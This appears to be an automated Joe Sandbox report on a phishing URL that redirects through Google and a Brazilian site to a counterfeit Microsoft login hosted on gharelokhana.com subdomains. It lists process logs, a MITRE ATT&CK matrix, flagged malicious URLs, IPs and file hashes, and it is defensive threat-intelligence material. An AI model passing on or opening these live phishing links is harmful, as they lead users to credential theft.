            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,5425962361269562764,13963646821391754707,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0 $$$ &c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,5425962361269562764,13963646821391754707,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Drive-by Compromise            		Windows Management Instrumentation1
            Browser Extensions            		1
            Process Injection            		1
            Masquerading            		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Registry Run Keys / Startup Folder            		1
            Registry Run Keys / Startup Folder            		1
            Process Injection            		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
            Ingress Tool Transfer            		Traffic DuplicationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            https://google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0$$$&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=10%Avira URL Cloudsafe

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://8cacc656-3c4125ca.gharelokhana.com/sbo.co.at/winauth/ssoprobe?client-request-id=a1e188a0-68bf-4354-b37c-5c94feca2ce3&_=1733383463857100%Avira URL Cloudmalware
            https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif100%Avira URL Cloudmalware
            https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif100%Avira URL Cloudmalware
            https://b1a4e5aa-3c4125ca.gharelokhana.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0100%Avira URL Cloudmalware
            https://djdjkdlellekkff.gharelokhana.com/4.5.1/npm-monitoring100%Avira URL Cloudmalware
            https://djdjkdlellekkff.gharelokhana.com/common/instrumentation/dssostatus100%Avira URL Cloudmalware
            https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico100%Avira URL Cloudmalware
            https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js100%Avira URL Cloudmalware
            https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC100%Avira URL Cloudmalware
            https://707242bf-3c4125ca.gharelokhana.com/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js100%Avira URL Cloudmalware
            https://alvoradavisual.com.br/favicon.ico0%Avira URL Cloudsafe
            https://l1ve.gharelokhana.com/Me.htm?v=3100%Avira URL Cloudmalware
            https://33767741-3c4125ca.gharelokhana.com/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js100%Avira URL Cloudmalware
            https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg100%Avira URL Cloudmalware
            https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js100%Avira URL Cloudmalware
            https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg100%Avira URL Cloudmalware
            https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js100%Avira URL Cloudmalware
            https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg100%Avira URL Cloudmalware
            https://djdjkdlellekkff.gharelokhana.com/favicon.ico100%Avira URL Cloudmalware
            https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/ConvergedLogin_PCore_i5YupurhQAo9inu_OetqHw2.js100%Avira URL Cloudmalware
            https://33767741-3c4125ca.gharelokhana.com/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css100%Avira URL Cloudmalware
            https://djdjkdlellekkff.gharelokhana.com/3c4125ca1ce249aea8b425e8555a32e2/100%Avira URL Cloudmalware
            https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js100%Avira URL Cloudmalware
            https://c65af2e9-3c4125ca.gharelokhana.com/Prefetch/Prefetch.aspx100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            c65af2e9-3c4125ca.gharelokhana.com
            		164.92.191.86
            		truetrue
              		unknown
              33767741-3c4125ca.gharelokhana.com
              		164.92.191.86
              		truetrue
                		unknown
                8cacc656-3c4125ca.gharelokhana.com
                		164.92.191.86
                		truetrue
                  		unknown
                  4b553e95-3c4125ca.gharelokhana.com
                  		164.92.191.86
                  		truetrue
                    		unknown
                    www.google.com
                    		172.217.21.36
                    		truefalse
                      		high
                      google.dz
                      		172.217.17.67
                      		truefalse
                        		high
                        707242bf-3c4125ca.gharelokhana.com
                        		164.92.191.86
                        		truetrue
                          		unknown
                          www.google.dz
                          		216.58.208.227
                          		truefalse
                            		high
                            djdjkdlellekkff.gharelokhana.com
                            		164.92.191.86
                            		truetrue
                              		unknown
                              alvoradavisual.com.br
                              		191.252.140.51
                              		truefalse
                                		high
                                b1a4e5aa-3c4125ca.gharelokhana.com
                                		164.92.191.86
                                		truetrue
                                  		unknown
                                  l1ve.gharelokhana.com
                                  		164.92.191.86
                                  		truetrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://djdjkdlellekkff.gharelokhana.com/common/instrumentation/dssostatustrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://djdjkdlellekkff.gharelokhana.com/4.5.1/npm-monitoringtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.giftrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://www.google.dz/amp/s/alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9Afalse
                                      		high
                                      https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.giftrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://b1a4e5aa-3c4125ca.gharelokhana.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.jstrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://8cacc656-3c4125ca.gharelokhana.com/sbo.co.at/winauth/ssoprobe?client-request-id=a1e188a0-68bf-4354-b37c-5c94feca2ce3&_=1733383463857true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://707242bf-3c4125ca.gharelokhana.com/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.jstrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SECtrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.icotrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1false
                                        		high
                                        https://alvoradavisual.com.br/favicon.icofalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://l1ve.gharelokhana.com/Me.htm?v=3true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svgtrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://djdjkdlellekkff.gharelokhana.com/favicon.icotrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svgtrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://33767741-3c4125ca.gharelokhana.com/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.jstrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.jstrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.jstrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=truetrue
                                          		unknown
                                          https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svgtrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/ConvergedLogin_PCore_i5YupurhQAo9inu_OetqHw2.jstrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://33767741-3c4125ca.gharelokhana.com/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.csstrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9Afalse
                                            		unknown
                                            https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9Afalse
                                              		unknown
                                              https://c65af2e9-3c4125ca.gharelokhana.com/Prefetch/Prefetch.aspxtrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://www.google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2Falvoradavisual.com.br%2Fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1false
                                                		high
                                                https://djdjkdlellekkff.gharelokhana.com/3c4125ca1ce249aea8b425e8555a32e2/true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://33767741-3c4125ca.gharelokhana.com/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.jstrue
                                                • Avira URL Cloud: malware
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                172.217.17.67
                                                		google.dzUnited States
                                                		15169GOOGLEUSfalse
                                                191.252.140.51
                                                		alvoradavisual.com.brBrazil
                                                		27715LocawebServicosdeInternetSABRfalse
                                                216.58.208.227
                                                		www.google.dzUnited States
                                                		15169GOOGLEUSfalse
                                                239.255.255.250
                                                		unknownReserved
                                                		unknownunknownfalse
                                                164.92.191.86
                                                		c65af2e9-3c4125ca.gharelokhana.comUnited States
                                                		46930ASN-DPSDUStrue
                                                172.217.21.36
                                                		www.google.comUnited States
                                                		15169GOOGLEUSfalse

                                                Private

                                                IP
                                                192.168.2.8

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1568921
                                                Start date and time:2024-12-05 08:22:15 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 3m 50s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:browseurl.jbs
                                                Sample URL:https://google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:7
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal76.phis.win@18/57@34/7
                                                EGA Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.17.46, 173.194.220.84, 172.217.17.78, 172.217.17.35, 172.217.21.42, 142.250.181.106, 172.217.17.42, 172.217.19.234, 172.217.19.170, 172.217.17.74, 142.250.181.74, 172.217.19.202
                                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, login.live.com, update.googleapis.com, clients.l.google.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: https://google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0$$$&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASNs

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 5 06:23:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2677
                                                Entropy (8bit):3.9774011260139557
                                                Encrypted:false
                                                SSDEEP:48:8ydLjTHPjfHcidAKZdA19ehwiZUklqehLy+3:8Sr+0y
                                                MD5:44D7864D2536FE82EF6948EE232CD194
                                                SHA1:E7752FEF1BB3E73EE121A8BD279CEF6610544786
                                                SHA-256:92ED9FDF04AA804A05BE12DF737E0BB4DBF20FE285652553C060873E45EA593E
                                                SHA-512:08C119451EC8F82176DA06F68499192CF0CA1B0446AF60155FD9CA9D7D8B803672F86E0F1A367505450BF613F7AA626F39132CE0242402A5444639396D98C1DD
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,....1...F..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.:....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.:....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.:....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.:..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.:...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............+Vs.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 5 06:23:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2679
                                                Entropy (8bit):3.9948034207951513
                                                Encrypted:false
                                                SSDEEP:48:8DdLjTHPjfHcidAKZdA1weh/iZUkAQkqehky+2:8Zrc9QVy
                                                MD5:60BDA08DFE3EE0BA8A8EFD6BB191D956
                                                SHA1:4DE503BD6B5798DD1BD0F547F1DDA39133F20D00
                                                SHA-256:A340E9A48AF83C8BA19264421538DF62210F61D54BF4699915F8CD80A232D996
                                                SHA-512:6969B42D485A6853EA6B0DD2CA0C69A283ADC66A85376B651BE64443A4ABD1A70B4BC6A05E5F9092969C0FA6D87ED1EA0829F009B6456F9FA4433186C5BCF592
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,....j...F..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.:....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.:....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.:....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.:..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.:...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............+Vs.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2693
                                                Entropy (8bit):4.005607176769167
                                                Encrypted:false
                                                SSDEEP:48:8xgdLjTHPsHcidAKZdA14tseh7sFiZUkmgqeh7s+y+BX:8xMrxnoy
                                                MD5:8BCCE5E06961B2FE68295E525CA0B4C6
                                                SHA1:D5885F1661400DA9C3A404E22FFBAA9F5B5F98E0
                                                SHA-256:39E4CACDD769C49AFDE22A37581BF0FF986EEA79BE490213640C06D34C173BB5
                                                SHA-512:FCD3F306DB8105B73BD29CBD057125AA8F73E1D751E750900A9571E5264468F30317A5FC848B0CEEB75E890651A86565FBFF15B27063B71CFF84D8214C55CD56
                                                Malicious:false
                                                Reputation:low
